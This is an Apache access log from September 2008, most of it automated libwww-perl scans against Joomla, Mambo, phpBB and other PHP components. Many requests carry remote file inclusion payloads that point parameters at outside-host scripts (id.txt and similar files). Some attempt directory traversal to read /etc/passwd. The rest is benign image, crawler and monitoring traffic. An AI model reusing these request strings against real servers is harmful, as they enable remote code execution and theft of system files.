71.105.90.168 - - [10/Sep/2008:00:25:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.105.90.168 - - [10/Sep/2008:00:25:00 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.105.90.168 - - [10/Sep/2008:00:25:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.105.90.168 - - [10/Sep/2008:00:25:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.250.238.63 - - [10/Sep/2008:00:25:24 -0400] "GET /logs/access_log.Q108082200//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:25:24 -0400] "GET //popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:25:24 -0400] "GET /logs//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
74.6.17.183 - - [10/Sep/2008:00:25:36 -0400] "GET /logs/access_log.Q108070900 HTTP/1.0" 200 3396727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.6.7 - - [10/Sep/2008:00:26:18 -0400] "GET /logs/access_log.Q108082200//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:26:18 -0400] "GET //popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:26:18 -0400] "GET /logs//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
80.254.47.10 - - [10/Sep/2008:00:26:28 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:26:28 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:26:28 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:26:36 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:26:39 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:26:40 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
66.249.67.114 - - [10/Sep/2008:00:26:49 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.114 - - [10/Sep/2008:00:26:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F53682F04854800D6F906S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.114 - - [10/Sep/2008:00:26:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3F53682F04D5A800DBF906S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.122.36.7 - - [10/Sep/2008:00:28:04 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
201.122.36.7 - - [10/Sep/2008:00:28:05 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
201.122.36.7 - - [10/Sep/2008:00:28:06 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
201.122.36.7 - - [10/Sep/2008:00:28:06 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
201.122.36.7 - - [10/Sep/2008:00:28:07 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
201.122.36.7 - - [10/Sep/2008:00:28:07 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:00:28:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.148.130.115 - - [10/Sep/2008:00:28:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
222.148.130.115 - - [10/Sep/2008:00:28:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
69.64.72.12 - - [10/Sep/2008:00:28:45 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.64"
69.64.72.12 - - [10/Sep/2008:00:28:45 -0400] "GET /convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.64"
69.64.72.12 - - [10/Sep/2008:00:28:45 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.64"
80.254.47.10 - - [10/Sep/2008:00:28:47 -0400] "GET /logs/error_log.Q108052700//modules/agendax/addevent.inc.php?agendax_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:28:47 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
80.254.47.10 - - [10/Sep/2008:00:28:47 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
69.64.72.12 - - [10/Sep/2008:00:28:55 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.64"
212.69.226.12 - - [10/Sep/2008:00:29:24 -0400] "GET /logs/error_log.Q108022200/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
212.69.226.12 - - [10/Sep/2008:00:29:24 -0400] "GET /errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
212.69.226.12 - - [10/Sep/2008:00:29:25 -0400] "GET /logs/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
216.55.133.16 - - [10/Sep/2008:00:29:31 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:29:31 -0400] "GET /convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:29:31 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
80.254.47.10 - - [10/Sep/2008:00:29:38 -0400] "GET /logs/error_log.Q108082000//modules/agendax/addevent.inc.php?agendax_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
216.55.133.16 - - [10/Sep/2008:00:29:42 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
116.234.173.125 - - [10/Sep/2008:00:30:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
116.234.173.125 - - [10/Sep/2008:00:30:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
194.135.105.1 - - [10/Sep/2008:00:30:19 -0400] "GET /logs/error_log.Q108090200//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:30:19 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:30:20 -0400] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
116.234.173.125 - - [10/Sep/2008:00:30:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
116.234.173.125 - - [10/Sep/2008:00:30:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
82.98.141.70 - - [10/Sep/2008:00:30:58 -0400] "GET /phpgedview/index.php?PGV_BASE_DIRECTORY=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 218 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
82.98.141.70 - - [10/Sep/2008:00:30:59 -0400] "GET /logs/phpgedview/index.php?PGV_BASE_DIRECTORY=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 223 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
194.135.105.1 - - [10/Sep/2008:00:31:00 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:32:03 -0400] "GET /logs/access_log.Q108060700//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:32:03 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:32:03 -0400] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.117.238.16 - - [10/Sep/2008:00:32:05 -0400] "GET /logs/error_log.Q108082100/japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
87.117.238.16 - - [10/Sep/2008:00:32:05 -0400] "GET /japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
87.117.238.16 - - [10/Sep/2008:00:32:05 -0400] "GET /logs/japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
194.135.105.1 - - [10/Sep/2008:00:32:28 -0400] "GET /logs/error_log.Q108070800//configinsert.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:32:28 -0400] "GET //configinsert.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
194.135.105.1 - - [10/Sep/2008:00:32:28 -0400] "GET /logs//configinsert.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
212.69.226.12 - - [10/Sep/2008:00:32:52 -0400] "GET /logs/access_log.Q108060700/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
209.59.12.99 - - [10/Sep/2008:00:33:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [10/Sep/2008:00:34:37 -0400] "GET /logs/access_log.Q108082200//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:34:38 -0400] "GET //popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:34:38 -0400] "GET /logs//popup.php?_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
89.108.64.200 - - [10/Sep/2008:00:34:42 -0400] "GET /logs/access_log.Q108082200//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
89.108.64.200 - - [10/Sep/2008:00:34:43 -0400] "GET //popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
89.108.67.220 - - [10/Sep/2008:00:34:43 -0400] "GET /logs/access_log.Q108082200//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
89.108.67.220 - - [10/Sep/2008:00:34:43 -0400] "GET //popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
89.108.64.200 - - [10/Sep/2008:00:34:43 -0400] "GET /logs//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
89.108.67.220 - - [10/Sep/2008:00:34:43 -0400] "GET /logs//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
194.135.105.1 - - [10/Sep/2008:00:35:48 -0400] "GET /logs/error_log.Q108051300//configinsert.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
74.6.17.183 - - [10/Sep/2008:00:35:33 -0400] "GET /logs/access_log.Q108012700 HTTP/1.0" 200 1035007 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.135.105.1 - - [10/Sep/2008:00:36:00 -0400] "GET /logs/access_log.Q108060500//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
87.117.238.16 - - [10/Sep/2008:00:36:00 -0400] "GET /logs/error_log.Q108082100/japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
87.117.238.16 - - [10/Sep/2008:00:36:01 -0400] "GET /japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
87.117.238.16 - - [10/Sep/2008:00:36:01 -0400] "GET /logs/japanese.php?u=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
209.90.77.32 - - [10/Sep/2008:00:36:15 -0400] "GET //oneadmin/config.php?path[docroot]=http://www.trosken.com/test.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.810"
194.135.105.1 - - [10/Sep/2008:00:36:36 -0400] "GET //configinsert.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
74.6.17.183 - - [10/Sep/2008:00:36:15 -0400] "GET /logs/access_log.Q107112800 HTTP/1.0" 200 3276991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [10/Sep/2008:00:38:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.183 - - [10/Sep/2008:00:38:38 -0400] "GET /logs/access_log.Q108031200 HTTP/1.0" 200 4322248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.72.12 - - [10/Sep/2008:00:38:52 -0400] "GET /logs/error_log.Q108061300//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.64"
69.64.72.12 - - [10/Sep/2008:00:38:53 -0400] "GET //skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.64"
69.64.72.12 - - [10/Sep/2008:00:38:53 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.64"
70.85.201.66 - - [10/Sep/2008:00:39:23 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
70.85.201.66 - - [10/Sep/2008:00:39:23 -0400] "GET /logs/access_log.Q108061500//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
70.85.201.66 - - [10/Sep/2008:00:39:28 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
69.64.72.12 - - [10/Sep/2008:00:39:39 -0400] "GET /logs/error_log.Q108051800//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.64"
220.133.121.243 - - [10/Sep/2008:00:39:54 -0400] "GET /logs/access_log.Q108082700/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
220.133.121.243 - - [10/Sep/2008:00:39:54 -0400] "GET /logs/error_log.Q108082400/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
220.133.121.243 - - [10/Sep/2008:00:39:54 -0400] "GET /logs/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
220.133.121.243 - - [10/Sep/2008:00:39:54 -0400] "GET /class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
220.133.121.243 - - [10/Sep/2008:00:40:10 -0400] "GET /logs/access_log.Q108082400/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
210.109.102.117 - - [10/Sep/2008:00:40:30 -0400] "GET /logs/access_log.Q108082700/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
210.109.102.117 - - [10/Sep/2008:00:40:30 -0400] "GET /logs/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
210.109.102.117 - - [10/Sep/2008:00:40:30 -0400] "GET /class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
70.85.201.66 - - [10/Sep/2008:00:40:50 -0400] "GET /logs/error_log.Q108081500//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
208.69.127.188 - - [10/Sep/2008:00:40:56 -0400] "GET /logs/error_log.Q108052900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
208.69.127.188 - - [10/Sep/2008:00:40:56 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/id.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
208.69.127.188 - - [10/Sep/2008:00:40:56 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
190.83.18.253 - - [10/Sep/2008:00:41:05 -0400] "GET /logs/access_log.Q108082600//MM/includes/db_connect.php?baseDir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.83.18.253 - - [10/Sep/2008:00:41:05 -0400] "GET //MM/includes/db_connect.php?baseDir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.109.102.117 - - [10/Sep/2008:00:41:06 -0400] "GET /logs/access_log.Q108082400/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
190.83.18.253 - - [10/Sep/2008:00:41:23 -0400] "GET /logs//MM/includes/db_connect.php?baseDir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
82.98.141.70 - - [10/Sep/2008:00:42:19 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
82.98.141.70 - - [10/Sep/2008:00:42:20 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
216.55.133.16 - - [10/Sep/2008:00:42:38 -0400] "GET /logs/error_log.Q108061300//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:42:39 -0400] "GET //skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:42:39 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
74.6.17.183 - - [10/Sep/2008:00:42:37 -0400] "GET /logs/access_log.Q107092300 HTTP/1.0" 200 557322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.135.105.1 - - [10/Sep/2008:00:43:16 -0400] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://connect.idelco.com/langs/404?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:43:30 -0400] "GET /logs/error_log.Q108051800//skin/zero_vote/error.php?dir=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:00:43:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.55.133.16 - - [10/Sep/2008:00:43:33 -0400] "GET /convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:43:55 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
209.90.77.32 - - [10/Sep/2008:00:44:12 -0400] "GET /logs/access_log.Q108081900//oneadmin/config.php?path[docroot]=http://www.trosken.com/test.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
209.90.77.32 - - [10/Sep/2008:00:44:12 -0400] "GET /logs//oneadmin/config.php?path[docroot]=http://www.trosken.com/test.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.810"
216.55.133.16 - - [10/Sep/2008:00:44:44 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:44:50 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
216.139.67.20 - - [10/Sep/2008:00:44:56 -0400] "GET /logs/error_log.Q108071700/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.64"
209.90.77.32 - - [10/Sep/2008:00:45:24 -0400] "GET /logs/error_log.Q108052900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/test.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
209.90.77.32 - - [10/Sep/2008:00:45:24 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/test.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
209.90.77.32 - - [10/Sep/2008:00:45:25 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.trosken.com/test.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
216.139.67.20 - - [10/Sep/2008:00:45:44 -0400] "GET /logs/error_log.Q108071700/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.64"
66.147.239.184 - - [10/Sep/2008:00:46:45 -0400] "GET /logs/access_log.Q108061500//components/com_simpleboard/image_upload.php?sbp=http://www.itel.cl/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
66.147.239.184 - - [10/Sep/2008:00:46:45 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.itel.cl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
